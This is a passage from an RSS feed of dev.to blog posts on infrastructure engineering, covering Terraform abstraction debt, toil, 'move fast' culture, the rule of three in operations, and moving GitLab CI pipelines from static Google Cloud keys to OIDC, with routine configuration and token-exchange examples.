&lt;p&gt;When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they're often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.&lt;/p&gt;

&lt;p&gt;Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn't require specialized knowledge to make basic changes. It doesn't become a bottleneck or a point of pride; it's just there, working, quietly enabling the business.&lt;/p&gt;

&lt;p&gt;This requires humility. The "clever" solution that demonstrates engineering prowess is often the wrong solution for the business. The "boring" solution that anyone can understand and modify is often right.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Minimum Viable Architecture Principle
&lt;/h2&gt;

&lt;p&gt;Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.&lt;/p&gt;

&lt;p&gt;Don't build for imagined future scale that may never materialize. Don't adopt sophisticated tooling because it's "best practice" if you don't have the problems it solves. Don't engineer abstractions that save lines of code but cost weeks of onboarding time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Infrastructure is an auxiliary operation.&lt;/strong&gt; Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion: Choose Boring Technology
&lt;/h2&gt;

&lt;p&gt;After years of working with Infrastructure as Code at various scales, here's what I've learned:&lt;/p&gt;

&lt;p&gt;Orchestration complexity can't be eliminated; it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.&lt;/p&gt;

&lt;p&gt;Terraform itself is powerful enough for most use cases. Most teams don't need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.&lt;/p&gt;

&lt;p&gt;There's a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren't there yet. They're paying complexity costs for benefits they haven't yet earned.&lt;/p&gt;

&lt;p&gt;Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.&lt;/p&gt;




&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>culture</category>
      <category>technicaldebt</category>
      <category>codequality</category>
    </item>
    <item>
      <title>Gang of Three: Pragmatic Operations Design Patterns</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Fri, 24 Oct 2025 16:54:20 +0000</pubDate>
      <link>https://dev.to/rosesecurity/gang-of-three-pragmatic-operations-design-patterns-a40</link>
      <guid>https://dev.to/rosesecurity/gang-of-three-pragmatic-operations-design-patterns-a40</guid>
      <description>&lt;p&gt;This blog is dedicated to &lt;a href="https://github.com/arcaven" rel="noopener noreferrer"&gt;arcaven&lt;/a&gt;, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.&lt;/p&gt;

&lt;h2&gt;
  
  
  I Can't Unsee It
&lt;/h2&gt;

&lt;p&gt;A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?&lt;/p&gt;

&lt;p&gt;The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you'll find the rule of three embedded in nearly every mature infrastructure decision.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where Consensus Algorithms Meet Change Management
&lt;/h2&gt;

&lt;p&gt;Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.&lt;/p&gt;

&lt;p&gt;Two nodes cannot lose anything without risking deadlock or split-brain scenarios. Four or five nodes provide more headroom for failures, but three is the minimum viable number that actually delivers reliable consensus. It is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation; this is mathematics driving architecture.&lt;/p&gt;
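
&lt;p&gt;The quorum arithmetic behind this is compact enough to write out (a majority is strictly more than half the nodes):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;majority(n)           = floor(n / 2) + 1
tolerated_failures(n) = n - majority(n)

n = 2: majority = 2, tolerated failures = 0
n = 3: majority = 2, tolerated failures = 1
n = 4: majority = 3, tolerated failures = 1
n = 5: majority = 3, tolerated failures = 2
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Note that four nodes tolerate no more failures than three while costing more and adding coordination overhead, which is one reason odd cluster sizes dominate in practice.&lt;/p&gt;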

&lt;p&gt;The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3 AM. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.&lt;/p&gt;

&lt;p&gt;This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.&lt;/p&gt;

&lt;h2&gt;
  
  
  AWS Best Practices and Chaos Engineering
&lt;/h2&gt;

&lt;p&gt;AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.&lt;/p&gt;

&lt;p&gt;Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.&lt;/p&gt;

&lt;p&gt;Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.&lt;/p&gt;

&lt;h2&gt;
  
  
  Storage Hierarchies and Performance Tiers
&lt;/h2&gt;

&lt;p&gt;Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.&lt;/p&gt;

&lt;p&gt;Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.&lt;/p&gt;
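
&lt;p&gt;In Terraform, the S3 version of this three-tier aging is a single lifecycle rule. The bucket reference and transition windows below are illustrative defaults, not a recommendation for your data:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;resource "aws_s3_bucket_lifecycle_configuration" "tiering" {
  bucket = aws_s3_bucket.data.id

  rule {
    id     = "age-out"
    status = "Enabled"

    # Warm: move to Infrequent Access after 30 days
    transition {
      days          = 30
      storage_class = "STANDARD_IA"
    }

    # Cold: archive to Glacier after 90 days
    transition {
      days          = 90
      storage_class = "GLACIER"
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;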

&lt;p&gt;Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Practical Value of Three
&lt;/h2&gt;

&lt;p&gt;Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.&lt;/p&gt;

&lt;p&gt;This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value. Thanks for reading, and if you like this blog, you might like the code and tools in &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>infrastructureascode</category>
      <category>systemdesign</category>
      <category>distributedsystems</category>
      <category>architecture</category>
    </item>
    <item>
      <title>I love writing useless tools... but I also believe that infrastructure-as-code deserves some more spice and flair, so I created Neofetch for Terraform! https://github.com/RoseSecurity/terrafetch</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Wed, 28 May 2025 12:30:10 +0000</pubDate>
      <link>https://dev.to/rosesecurity/i-love-writing-useless-tools-but-i-also-believe-that-infrastructure-as-code-deserves-some-more-19m7</link>
      <guid>https://dev.to/rosesecurity/i-love-writing-useless-tools-but-i-also-believe-that-infrastructure-as-code-deserves-some-more-19m7</guid>
      <description></description>
      <category>terraform</category>
      <category>devops</category>
      <category>opensource</category>
      <category>tooling</category>
    </item>
    <item>
      <title>The Abstraction Debt in Infrastructure as Code</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Fri, 11 Apr 2025 12:10:12 +0000</pubDate>
      <link>https://dev.to/rosesecurity/the-abstraction-debt-in-infrastructure-as-code-g6g</link>
      <guid>https://dev.to/rosesecurity/the-abstraction-debt-in-infrastructure-as-code-g6g</guid>
      <description>&lt;p&gt;This article serves as the starting point for a microblog series exploring the challenges of managing Infrastructure-as-Code (IaC) at scale. The reflections here are solely my own views, based on my experiences and the lessons learned (sometimes the hard way) when building and maintaining large-scale infrastructure. This first entry lays the groundwork for the complexities, trade-offs, and regrets that come with designing IaC solutions.&lt;/p&gt;

&lt;h2&gt;
  
  
  In the Early Days
&lt;/h2&gt;

&lt;p&gt;When we initially adopted IaC, the goal was clear: &lt;em&gt;manage multiple environments efficiently, at scale, with precision and consistency&lt;/em&gt;. This is a vision many teams share, but as scale grows, the constraints of existing tools become apparent. Terraform’s native capabilities, while powerful (and since expanded with workspaces and other extensible features), were limiting when trying to orchestrate infrastructure across multiple AWS organizations and dozens of accounts in a DRY and reusable way.&lt;/p&gt;

&lt;p&gt;I came across numerous tutorials demonstrating the simplicity of spinning up an EC2 instance in &lt;code&gt;us-east-1&lt;/code&gt;, but when that scales to provisioning 500 servers across multiple AWS organizations, those examples fall apart. At this point, the choices become either extending Terraform’s capabilities with additional tooling or abandoning DRY principles and managing complexity through repetition.&lt;/p&gt;

&lt;p&gt;Initially, abstraction seemed like the best answer. However, a problem emerged that I hadn’t anticipated: over-abstraction became a form of technical debt. Abstraction is meant to encapsulate complexity, but when done poorly, it creates opacity—a lack of visibility into what’s actually happening under the hood. When a system inevitably breaks, new team members must wade through multiple layers of abstraction just to diagnose a simple issue. What started as an attempt to simplify infrastructure management ended up creating barriers to understanding and troubleshooting. The real challenge becomes: &lt;em&gt;How do we balance complexity with simplifying processes without over-abstracting everything?&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Where Abstraction Becomes a Liability
&lt;/h2&gt;

&lt;p&gt;While abstraction is often framed as a best practice, it can quickly become a liability. Deeply nested modules make understanding resource interactions difficult. Custom wrappers and internal CLIs built on top of Terraform introduce learning curves and debugging complexity. Hidden dependencies, such as implicit tagging schemes or assumptions baked into modules, make troubleshooting non-obvious issues much harder. At some point, abstraction reaches a point of diminishing returns, where the overhead required to maintain and debug it outweighs the benefits of reuse.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Balance Simplicity with Over-Abstraction
&lt;/h2&gt;

&lt;p&gt;To prevent abstraction from becoming a burden, it’s critical to strike the right balance. Escape hatches must exist so engineers can bypass abstractions when needed. A Terraform module should allow direct modification of key parameters rather than enforcing rigid defaults. Observability must be a first-class concern; abstractions should provide clear logs, structured outputs, and access to underlying configurations. Versioning and documentation should be explicit and ensure that abstractions are transparent in their purpose. Finally, abstractions should only be introduced once a pattern has been implemented natively at least once. Premature abstraction often leads to overengineering rather than efficiency.&lt;/p&gt;
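
&lt;p&gt;As a deliberately simplified sketch of what an escape hatch can look like in a Terraform module (assume &lt;code&gt;var.ami_id&lt;/code&gt; and &lt;code&gt;local.required_tags&lt;/code&gt; are defined elsewhere in the module), expose overridable parameters and a pass-through map instead of enforcing rigid defaults:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;variable "instance_type" {
  description = "Sensible default, but directly overridable per caller"
  type        = string
  default     = "t3.medium"
}

variable "extra_tags" {
  description = "Escape hatch: callers can attach tags the module never anticipated"
  type        = map(string)
  default     = {}
}

resource "aws_instance" "this" {
  ami           = var.ami_id
  instance_type = var.instance_type

  # Enforced tags win, but callers are not boxed in
  tags = merge(var.extra_tags, local.required_tags)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The point is not the specific variables; it is that the caller can reach the underlying resource's behavior without forking the module.&lt;/p&gt;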

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The key takeaway is that abstraction in IaC should be a tool for scalability, not avoidance of complexity. If the complexity of an abstraction exceeds the complexity of the problem it was meant to solve, it’s doing more harm than good. This is just the beginning of the discussion. In future posts, I’ll explore random challenges and thoughts that pop up as we navigate the wild world of infrastructure together.&lt;/p&gt;

&lt;p&gt;If you're interested in more of my work, feel free to check out &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;. It's where I keep all of the good stuff.&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>aws</category>
      <category>infrastructureascode</category>
      <category>architecture</category>
    </item>
    <item>
      <title>Engineering in Quicksand</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 08 Apr 2025 02:10:37 +0000</pubDate>
      <link>https://dev.to/rosesecurity/engineering-in-quicksand-31p7</link>
      <guid>https://dev.to/rosesecurity/engineering-in-quicksand-31p7</guid>
      <description>&lt;p&gt;Welcome to part two of my microblog series on the overlooked killers of engineering teams—the problems that quietly erode productivity in the DevOps community without getting much attention. I previously covered over-abstraction as a liability, showing how excessive layers of abstraction introduce technical debt.&lt;/p&gt;

&lt;p&gt;Today, I’m tackling another silent killer: toil. It’s the invisible weight dragging teams down, forcing engineers to maintain instead of build. While some toil is inevitable, too much of it suffocates innovation and drives attrition. Let’s talk about how it happens—and how to stop it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Birth of Toil
&lt;/h2&gt;




&lt;p&gt;&lt;em&gt;"Needing a human in the loop isn’t a feature... it’s a failure. And as your system grows, so does the cost of that failure. What’s ‘normal’ today won’t be tomorrow."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;When I first stepped into the world of Site Reliability Engineering, I was introduced to the concept of toil. Google’s SRE handbook defines toil as anything repetitive, manual, automatable, reactive, and scaling with service growth—but in reality, it’s much worse than that. Toil isn’t just a few annoying maintenance tickets in Jira; it’s a tax on innovation. It’s the silent killer that keeps engineers stuck in maintenance mode instead of building meaningful solutions.&lt;/p&gt;

&lt;p&gt;I saw this firsthand when I joined a new team plagued by recurring Jira tickets from a failing &lt;code&gt;dnsmasq&lt;/code&gt; service on their autoscaling GitLab runner VMs. The alarms never stopped. At first, I was horrified when the proposed fix was simply restarting the daemon and marking the ticket as resolved. The team had been so worn down by years of toil and firefighting that they’d rather SSH into a VM and run a command than investigate the root cause. They weren’t lazy—they were fatigued.&lt;/p&gt;

&lt;p&gt;This kind of toil doesn’t happen overnight. It’s the result of years of short-term fixes that snowball into long-term operational debt. When firefighting becomes the norm, attrition spikes, and innovation dies. The team stops improving things because they’re too busy keeping the lights on. Toil is self-inflicted, but the first step to recovery is recognizing it exists and having the will to automate your way out of it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Addressing Toil and Moving Forward
&lt;/h2&gt;

&lt;p&gt;By now, I’ve spent plenty of time hammering home how toil is silently killing your engineering team, but let’s be real—not all toil is bad. Some engineers actually enjoy the predictability of a well-understood, repeatable task. The problem isn’t toil itself; it’s when it overwhelms a team and leaves no room for innovation.&lt;/p&gt;

&lt;p&gt;Toil isn’t a constant—it fluctuates. One quarter might be toil-heavy, while another is more focused on feature development. The key is ensuring that engineers aren’t stuck doing toil indefinitely. Google recommends keeping toil below 50% of an engineer’s time—I go even further and suggest keeping it under 33% over sustained periods. Of course, this depends on on-call schedules, incident response, and team overhead, but the goal is clear: &lt;em&gt;minimize toil, or it will minimize your team’s effectiveness.&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How to Reduce Toil
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Identify it early&lt;/strong&gt;. If a task is manual, repetitive, and requires intervention, label it as toil.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Automate aggressively&lt;/strong&gt;. If a machine can do it, it should be doing it.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Prioritize fixing toil&lt;/strong&gt;. Dedicate at least 33% of sprint time to resolving toil-related issues.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Create a structured backlog&lt;/strong&gt;. Label toil-related tickets (e.g., &lt;code&gt;KTLO&lt;/code&gt; – Keep The Lights On) and actively allocate resources to fix them.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Prevent new toil&lt;/strong&gt;. Shift left—design systems that don’t introduce unnecessary toil in the first place.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;At a previous job, our team made a conscious effort to tackle toil head-on. We dedicated part of every sprint to eliminating KTLO work, balancing long-term architecture improvements with reducing operational pain. Toil will never fully disappear, but by consistently addressing it, you can keep your team focused on meaningful work instead of endless firefighting.&lt;/p&gt;

&lt;p&gt;In the end, the best way to deal with toil is to stop introducing it in the first place. It might sound like a cop-out, but good engineering prevents toil before it ever becomes a problem. Shift left, automate, and keep your engineers building—not just maintaining.&lt;/p&gt;

&lt;p&gt;If you're interested in more of my work, feel free to check out &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;. It's where I keep all of the good stuff.&lt;/p&gt;

</description>
      <category>culture</category>
      <category>workplace</category>
      <category>startup</category>
    </item>
    <item>
      <title>Rushing Toward Rewrite</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Fri, 28 Mar 2025 17:31:56 +0000</pubDate>
      <link>https://dev.to/rosesecurity/rushing-toward-rewrite-596k</link>
      <guid>https://dev.to/rosesecurity/rushing-toward-rewrite-596k</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This post originally appeared on &lt;a href="https://rosesecurity.dev/blog/2025/03/26/rushing-toward-rewrite" rel="noopener noreferrer"&gt;rosesecurity.dev&lt;/a&gt;. If you like deep dives on infrastructure, Terraform, and the real cost of technical choices, follow along there too.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.&lt;/p&gt;

&lt;h2&gt;
  
  
  Move Fast and Don’t Break Everything
&lt;/h2&gt;

&lt;p&gt;A former CEO of mine used to say: &lt;em&gt;“Be fast or be perfect. And since no one’s perfect, you better be fast.”&lt;/em&gt; Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”&lt;/p&gt;

&lt;p&gt;Spoiler: they didn’t need it.&lt;/p&gt;

&lt;p&gt;The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: &lt;em&gt;moving fast is possible without setting your future self on fire&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Here’s what I’ve learned:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Fail fast—but fail forward.&lt;/strong&gt; Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Build for iteration.&lt;/strong&gt; Forget perfect. Aim for clear next steps. Your &lt;code&gt;v1&lt;/code&gt; should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it &lt;em&gt;better&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Stay modular.&lt;/strong&gt; Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Be honest about scale.&lt;/strong&gt; What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.&lt;/p&gt;
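
&lt;p&gt;Point 3 is the easiest one to make concrete. An OpenTelemetry collector is one way to keep vendor coupling thin: services send telemetry to the collector, and the vendor is just an exporter entry in its config. The endpoints below are placeholders, not a recommendation:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# otel-collector config sketch: swapping vendors means editing this file,
# not re-instrumenting every service
receivers:
  otlp:
    protocols:
      grpc:

exporters:
  # Today: the pricey SaaS
  otlphttp/vendor:
    endpoint: https://ingest.example-vendor.com

  # Tomorrow: self-hosted backend, zero application changes
  # prometheusremotewrite:
  #   endpoint: http://metrics.internal:9009/api/v1/push

service:
  pipelines:
    metrics:
      receivers: [otlp]
      exporters: [otlphttp/vendor]
&lt;/code&gt;&lt;/pre&gt;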

&lt;p&gt;We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>terraform</category>
      <category>softwareengineering</category>
      <category>techdebt</category>
    </item>
    <item>
      <title>Upgrading GitLab CI/CD Authentication: Migrating to OIDC for Google Cloud</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 27 Feb 2024 03:34:14 +0000</pubDate>
      <link>https://dev.to/rosesecurity/upgrading-gitlab-cicd-authentication-migrating-to-oidc-for-google-cloud-3kd5</link>
      <guid>https://dev.to/rosesecurity/upgrading-gitlab-cicd-authentication-migrating-to-oidc-for-google-cloud-3kd5</guid>
      <description>&lt;h2&gt;
  
  
  The Challenge
&lt;/h2&gt;

&lt;p&gt;Why should I migrate my pipelines to OIDC? I have my Service Account credentials stored securely in a CI/CD variable, and I don't plan on it going anywhere. Here's the thing: static keys present a significant risk of compromise since they remain constant over time. If these keys are compromised, an attacker could potentially manipulate the cloud environment undetected for an extended period, posing a severe threat to the security and integrity of the infrastructure and the data stored within it.&lt;/p&gt;

&lt;p&gt;Additionally, static keys lack context and are highly portable, which exacerbates the risk. Unlike dynamically generated tokens tied to specific environments, static keys can be copied and used across multiple environments without any linkage to their origin. This portability makes it difficult for security teams to trace where the keys are being used, increasing the difficulty of detecting and mitigating unauthorized access or malicious activity. Introducing OIDC!&lt;/p&gt;

&lt;h2&gt;
  
  
  The Benefits of OIDC
&lt;/h2&gt;

&lt;p&gt;Google Cloud's Workload Identity Federation is the safer, recommended way to authenticate your GitLab pipelines with Google Cloud. It eliminates static keys for authentication, and with them the burden of long-term key management: a temporary access token is issued on each run, so there is no compliance requirement to rotate secrets every few months, and a leaked credential is only useful to an attacker for the token's short lifetime. Overall, Workload Identity Federation provides a more secure, lower-maintenance way to connect GitLab pipelines to Google Cloud resources than static service account keys: the short-lived tokens provide defense in depth against leaked credentials while freeing developers from constant key rotation.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it Works
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq8nrrzlmxt54xi6qgm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq8nrrzlmxt54xi6qgm5.png" alt="How it Works" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;
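
&lt;p&gt;Under the hood, the exchange boils down to two REST calls: the pipeline's OIDC token is traded at Google's Security Token Service for a federated token, which is then used to impersonate the Service Account. The following sketch shows the equivalent raw calls (the Google auth libraries and &lt;code&gt;gcloud&lt;/code&gt; perform these for you; the &lt;code&gt;...&lt;/code&gt; values are illustrative placeholders):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# 1. Exchange the GitLab OIDC token for a federated access token
curl -s -X POST https://sts.googleapis.com/v1/token \
  -d grant_type=urn:ietf:params:oauth:grant-type:token-exchange \
  -d audience=//iam.googleapis.com/projects/.../workloadIdentityPools/.../providers/... \
  -d subject_token_type=urn:ietf:params:oauth:token-type:jwt \
  -d requested_token_type=urn:ietf:params:oauth:token-type:access_token \
  -d scope=https://www.googleapis.com/auth/cloud-platform \
  -d subject_token="$GITLAB_OIDC_TOKEN"

# 2. Use the federated token to mint a short-lived Service Account access token
curl -s -X POST \
  -H "Authorization: Bearer $FEDERATED_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"scope": ["https://www.googleapis.com/auth/cloud-platform"]}' \
  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/${SERVICE_ACCOUNT}:generateAccessToken"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;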

&lt;h2&gt;
  
  
  Demonstration
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Existing Infrastructure
&lt;/h3&gt;

&lt;p&gt;The following demonstration walks through the infrastructure that enables secure authentication between a GitLab pipeline and Google Cloud resources. When the pipeline is triggered, Workload Identity Federation automatically exchanges the pipeline's credentials for temporary IAM access tokens used to deploy into Google Cloud. The following components already exist within the CI/CD pipeline and Google Cloud:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Terraform Service Account for the pipelines&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fthhacgnsk09hc0n2akvs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fthhacgnsk09hc0n2akvs.png" alt="Service Account" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pipeline utilizing Service Account static credentials to create infrastructure
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;stages&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;validate&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;test&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;build&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;deploy&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;cleanup&lt;/span&gt;

&lt;span class="na"&gt;before_script&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;cat $GCP_CREDENTIALS &amp;gt; /tmp/gcp_credentials.json&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
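
&lt;p&gt;For context, a job consuming that static key typically looks something like the following (a hypothetical example, not taken from the article's pipeline):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;deploy:
  stage: deploy
  script:
    - export GOOGLE_APPLICATION_CREDENTIALS=/tmp/gcp_credentials.json
    - terraform init
    - terraform apply -auto-approve
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The key sits on disk for the lifetime of the job and remains valid long after the job finishes, which is precisely the exposure OIDC removes.&lt;/p&gt;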



&lt;h3&gt;
  
  
  Harnessing Google Workload Identity
&lt;/h3&gt;

